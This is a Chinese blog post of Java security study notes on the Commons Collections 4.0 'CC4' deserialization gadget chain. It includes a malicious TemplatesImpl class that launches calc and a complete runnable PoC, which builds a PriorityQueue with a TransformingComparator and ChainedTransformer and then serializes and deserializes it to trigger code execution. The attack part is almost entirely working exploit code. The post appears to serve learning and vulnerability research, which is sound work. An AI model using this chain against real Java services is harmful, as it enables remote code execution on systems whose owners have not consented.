Java安全学习笔记--反序列化漏洞利用链CC4链

最新推荐文章于 2024-05-17 01:47:26 发布
最新推荐文章于 2024-05-17 01:47:26 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: Java安全 文章标签: java 安全 开发语言 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122611195
版权

测试环境

jdk1.8(jdk8u71)

Commons Collections4.0        

基于cc2和cc3,由于TransformingComparator+priorityqueue是可以触发transforme()方法所以可以利用这个两个类的组合来代替cc3链中的LazyMap或Transformedmmap+AnnotationinvocationHandler的组合,从而构成了cc4。 

 恶意类

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;


public class evilClass extends AbstractTranslet{
    //需要继承AbstractTranslet,因为在defineTransletClasses中会判断是否继承了这个类没有会报错
    public evilClass() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    //两种触发方式构造方法和静态代码块
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }}


    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }


}

利用链核心

   ClassPool classPool= ClassPool.getDefault();
        CtClass ctClass=classPool.getCtClass("com.test.evilClass");
        byte[] bytes=ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templatesImpl = new TemplatesImpl();
        Field field1=templatesImpl.getClass().getDeclaredField("_name");
        Field field2=templatesImpl.getClass().getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templatesImpl,"evilClass");
        field2.set(templatesImpl,new byte[][]{bytes});
        //通过反射将bytes和一个name赋值给TemplatesImpl的_name和_bytecodes
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl})
        };
        Transformer chainedTransformer=new ChainedTransformer(transformers);

 编写POC

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;


import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC4Poc {
    public static void main(String[] args) throws Exception {
        //用Exception免得边写边加报错类型
        //将恶意类转换为字节码
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.test.evilClass");
        byte[] bytes = ctClass.toBytecode();

        //反射创建TemplatesImpl
        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor();
        TemplatesImpl templates = (TemplatesImpl) constructor.newInstance();
        //将恶意类的字节码设置给_bytecodes属性
        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, new byte[][]{bytes});
        //设置属性_name为恶意类名
        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates , "evilClass");

        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        Transformer chainedTransform=new ChainedTransformer(transformers);
        TransformingComparator transformingComparator=new TransformingComparator(chainedTransform);
        PriorityQueue queue=new PriorityQueue(2);
        queue.add(1);
        queue.add(1);
        //入队两个元素,之后通过反射替换掉
        Field comparator=queue.getClass().getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(queue,transformingComparator);
        //将优先队列的比较器设置为transforminComparator
        Field fieldQueue=queue.getClass().getDeclaredField("queue");
        fieldQueue.setAccessible(true);
        fieldQueue.set(queue,new Object[]{chainedTransform,chainedTransform});
        //将两个chainedTransform入队,在触发比较器后就会调用transform方法
        ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream=new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
        objectOutputStream.close();
        //序列化
        ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }
}

m0v0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全CommonsCollections4
顶峰
01-09 1510
这次给大家带来的是CC4的简单分析,可以看到CC4还是没有脱离之前跟的的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC就快跟完了。
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
CC总结
王嘟嘟的博客
03-14 657
整理一下CC相关的内容,单独存放,方便复习。
Java反序列化 CC4利用记录
LTianHang的博客
02-07 218
Java反序列化 CC4利用记录
Java Shiro反序列化CommonsCollections利用分析_shiro 利用
最新发布
2401_84969008的博客
05-17 1002
下面的分析是按照Source->Chain->Sink式原则进行反推的,其中Source为反序列化的入口(即重写了readObject方法的类),Chain为利用,Sink为可以执行任意命令或方法的危险函数。
Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击
cjdgg的博客
10-06 1366
知识点补充可以看看我前面写的CC2和CC3CC4这条其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例化 TemplatesImpl。
[Java反序列化]—CommonsCollections4
snowlyzz的博客
11-26 616
CC4分析
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
deserialize-test:反序列化漏洞学习记录
05-01
在IT安全领域,反序列化漏洞是一种常见的安全隐患,尤其在Java编程环境中尤为突出。本学习记录将深入探讨Java中的反序列化漏洞,帮助你理解其原理、危害以及如何防范。 反序列化是对象持久化过程的一部分,它将之前...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1222
在CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用。...
Java反序列化漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 1558
因为这条利⽤中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列化中使⽤。实际上是可用的,比如CC6的,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用
10-java安全——java反序列化CC3和CC4分析
网络安全
07-20 1929
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
CC4分析
..
10-27 581
CC更新了一个大的版本,今天讲的是更新后的。
Javaweb安全——反序列化漏洞-commons-collections4利用(CC2和CC4
weixin_43610673的博客
07-06 2261
在2015年底commons-collections反序列化利用被提出时,Apache Commons Collections有以下两个分支版本:对旧CC的影响主要体现在 这个方法被修改了在commons-collections4中对应的方法为。3和4的groupId和artifactId都不一样所以可以在同一项目中共存方便调试。 还是做的一个LazyMap构造函数包装,基本就是改了个名字,那将之前的子decorate换成lazyMap就行,导入的包名变。以CC6为例: CC1、CC3、CC6修改之后
Java安全--CC4
qq_64201116的博客
12-16 699
而且最关键的是这里它还执行了break方法,所以下面的serialize是压根没有执行,所以连ser.bin的序列化文件都没有生成,怎么反序列化呢?接着在反序列化之前,add函数之后利用反射修改其值改回chainedTransformer,这样在反序列化的时候就可以执行了。为什么我们CC3前面半条不能用这个子,或者有CC3不就足够了,为什么要再找一个这样的子,不是画蛇添足吗?我们发现这个判断的时候就被阻隔了,size就是值队列内的数量,因为我们没有添加过任何元素所以这里默认就是0。
Java安全反序列化-CC4反序列化漏洞POP分析_ysoserial CommonsCollections4 PoC分析
Ho1aAs‘s Blog
03-12 984
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定的类构造器3. TransformingComparator.compare()调用this.transformer.transform()4. PriorityQueue反序列化调用comparator.compare()POP完 前言 同样的,CC4是CC2的变种,改变
shiro-550反序列化漏洞与shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞与Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值